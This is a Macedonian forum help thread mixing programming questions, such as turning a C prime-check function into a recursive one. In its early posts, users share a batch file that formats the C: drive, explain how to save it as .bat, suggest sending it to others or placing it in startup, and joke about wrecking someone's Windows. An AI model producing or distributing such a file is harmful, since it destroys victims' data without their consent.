Помош: Општи прашања, совети, трикови..

Xibalba

Corona Australis
Член од
24 јануари 2012
Мислења
6.091
Поени од реакции
11.496
Ова ти е беч команда за форматирање на C партицијата

@echo off
format C: /FS:NTFS /X /Q

Член од
19 јуни 2012
Мислења
404
Поени од реакции
417
Вака значи темата ја отварам за разговор оклу Batch.Мене ми треба помош оклу Batch ми треба дефиниција.
значи сакаш да направиш Batch-програмче, и да му го пуштиш на некој и да му сјебиш Windows ? да му форматираш C ? :D хаха xD

ferdzo(hacker) :)

Македонче
Член од
19 април 2013
Мислења
115
Поени од реакции
14
Не ми ја извршва командата за формат ај ако сакаш напрај го фајлот за формат и за рестарт.

Bitcoin

Член од
24 мај 2005
Мислења
5.530
Поени од реакции
13.903
научи го DOS прво, па после ќе прајш вируси, уствари txt фајлој зачувани какo .bat шо ќе ги редиш на startup :pos:

Член од
23 јуни 2008
Мислења
9.265
Поени од реакции
5.045
Отвори notepad,

@echo off
format C:

зачувај го како .bat документ и отвори го после за да почнат да работат командите и моеш да го праќаш.

позз

ruller

Expert
Член од
5 септември 2011
Мислења
526
Поени од реакции
352
Ај ако има некој да ми дај линк од мк туторијал за Офис 2007 или 2010 би му бил благодарен

Член од
27 ноември 2008
Мислења
1.433
Поени од реакции
341
кој се разбира од windows 8 metro apps html/javascript? ми треба помош мала

Член од
21 февруари 2011
Мислења
385
Поени од реакции
487
има некој шо се разбира SDN, POX контролер поточно правам, ми треба помош?

П

Паган-др

Гостин
Имам едно прашање. Дали има некој начин/шема што ќе ми ја олесни работата обична функција да ја претворам во рекурзивна? Или некоја постапка за полесно да дојдам до рекурзивната функција од нула?

Конкретно сега имам обична функција што проверува дали бројот е прост или не, ама ми треба функцијата да ја претворам во рекурзивна. За Ц се работи.

Xibalba

Corona Australis
Член од
24 јануари 2012
Мислења
6.091
Поени од реакции
11.496
Конкретно сега имам обична функција што проверува дали бројот е прост или не, ама ми треба функцијата да ја претворам во рекурзивна. За Ц се работи.
Имаш готови примери за прости броеви, види овде.

П

Паган-др

Гостин
Имаш готови примери за прости броеви, види овде.

Да, ама со готови примери малце потешко ќе ја совладам рекурзијата. Мислев ако има некој совет, нешто, за сам да пробам да дојдам до неа.

Фала сепак, ќе биде и ова од помош. :)

Kajgana Shop

На врв Bottom